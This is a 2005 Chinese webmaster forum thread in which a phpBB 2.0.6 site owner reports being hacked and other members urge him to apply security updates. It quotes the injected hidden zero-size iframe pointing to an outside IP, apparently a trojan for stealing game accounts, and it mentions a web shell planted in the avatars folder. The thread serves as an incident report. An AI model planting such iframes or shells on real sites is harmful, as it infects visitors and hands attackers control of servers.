Webmasters Discussion
站長們到此分享架站甘苦、管理心得等;歡迎大家多多提出意見喔!
(請勿發表任何跟站長經驗分享不相干的文章,違者砍文)
版主: 版主管理群
jawa560
星球公民
文章: 35 註冊時間: 2003-09-20 21:34
文章
由 jawa560 » 2005-03-20 02:09
版本phpBB2.06
侵入方式:
修改版面分區內容,植入\r
代碼: 選擇全部
<iframe src="http://210.51.23.7/help.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
應該是盜取天堂資料的木馬,真是可惡,看來不升級是不行了!
攔截畫面如下:
最後由
jawa560 於 2005-03-20 03:03 編輯,總共編輯了 1 次。
jawa560
星球公民
文章: 35 註冊時間: 2003-09-20 21:34
文章
由 jawa560 » 2005-03-20 02:54
剛剛又發現大頭照的資料夾裡(images/avatars),發現了一隻木馬程式
._admin.php
XD,竟是一隻類似telnet的程式,原名應該叫myshell, 帳號密碼對了,就可以直接對主機下系統指令! 大家趕快查一查!
最後由
jawa560 於 2005-03-20 03:02 編輯,總共編輯了 3 次。
jawa560
星球公民
文章: 35 註冊時間: 2003-09-20 21:34
文章
由 jawa560 » 2005-03-20 02:57
恭請站長是否可新增一個駭客通報區,這樣大家才能即時防護自己的系統!
design
竹貓忠實會員
文章: 330 註冊時間: 2003-10-31 00:36
聯繫:
文章
由 design » 2005-03-20 03:16
jawa560 寫: 版本phpBB2.06
連安全性升級都不在乎的
新增駭客通報區有用嗎
jawa560
星球公民
文章: 35 註冊時間: 2003-09-20 21:34
文章
由 jawa560 » 2005-03-20 03:43
樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的,而且別人加了多少外掛而導致升級困難的狀況,也不一而足,所以這樣講並不太公平!
aHfUi
星球公民
文章: 184 註冊時間: 2004-11-14 17:52
聯繫:
文章
由 aHfUi » 2005-03-20 04:32
那么你要花1点点时间来升级
还是一直给人家HACK @@?
jawa560
星球公民
文章: 35 註冊時間: 2003-09-20 21:34
文章
由 jawa560 » 2005-03-20 05:28
有沒有空升級,或升級有沒有困難是一回事,駭客事件有沒有收集的價值是另一回事。不過,還是很感謝大家的意見!
黑風凱特
星球公民
文章: 267 註冊時間: 2004-12-13 22:12
來自: 台灣台北
聯繫:
文章
由 黑風凱特 » 2005-03-20 12:42
不升級安全性更新...
你的站台剛好可以給新手hacker練習用....
快快更新吧....
要不了多少時間的~
Mac
百戰天龍馬蓋先
文章: 2590 註冊時間: 2003-02-02 02:28
來自: MacphpBBMOD
聯繫:
文章
由 Mac » 2005-03-20 13:59
jawa560 寫: 樓上的大哥,很多人並不是有那麼多時間可以專心在維護論壇的,而且別人加了多少外掛而導致升級困難的狀況,也不一而足,所以這樣講並不太公平!
你的邏輯有問題吧?既然沒空維護論壇,那被駭了要怪誰呢?
既然都已經有『公告區』要大家升級 phpBB 都沒用了,你認為『駭客通報區』的成效有多少?
~Mac
jawa560
星球公民
文章: 35 註冊時間: 2003-09-20 21:34
文章
由 jawa560 » 2005-03-20 14:30
對不起,混亂大家的思考了!
我要說的是,被駭是我家的事,我自會解決. 但我希望有駭客事件通報區.
政府雖然可發公報,但五花八門的新聞播報仍然有其收視率!
最後由
jawa560 於 2005-03-20 14:37 編輯,總共編輯了 1 次。
godbless
竹貓忠實會員
文章: 647 註冊時間: 2002-05-17 06:02
來自: 台北市南京東路4段
聯繫:
文章
由 godbless » 2005-03-20 14:34
jawa560 寫: 那意思就是說,只要政府有發公報,五花八門的新聞播報就沒價值了?
有宣傳價值...
其實有很多時候都是媒體先發播報,然後政府才發公報的...
外掛問題區發問格式就在
這裡 ,請務必一定照著格式來~!
你不照著規則來,就算是
神 也搞不清楚你的問題在哪裡!
新手問問題不是罪惡
罪惡的是自己沒有先做好本分和功課,說話的口氣也不好,再加上態度有好像我們這群人欠你多少似的~~!!
竹貓星球發問規則:
http://phpbb-tw.net/phpbb/viewtopic.php?t=16149
發問比率最高的句子翻譯:
Please ensure both the install/ and contrib/ directories are deleted
請確認install和contrib資料夾已被刪除(奇怪,翻一下英漢字典有這麼困難嗎)
haw
星球公民
文章: 65 註冊時間: 2004-03-02 21:14
文章
由 haw » 2005-03-20 21:03
自己不做好論壇的維護
有在多的通報\r
你也只能知道自己即將被哪種木馬hack罷了
升級也不過花個十幾二十分鐘
我想絕對比你去查,去解,去知道那些hack跟木馬還快吧?
思考方向偏差真的頗大喔!
oscerropper
星球公民
文章: 197 註冊時間: 2004-12-21 17:56
來自: 興趣的黑洞
文章
由 oscerropper » 2005-03-21 11:33
更新是為自己的論壇系統安全,等你被駭後就得不嘗失,我相信你的作業系統也會定期更新吧
●架設主機作業系統:Unix
●您的上網方式:虛擬主機。
●您安裝的程式:
Apache version 2.0.63
MySQL version 45.0.92-community
PHP version 5.2.14
Perl version 5.8.8
●您的 phpBB2 版本:phpBB 3.0.8。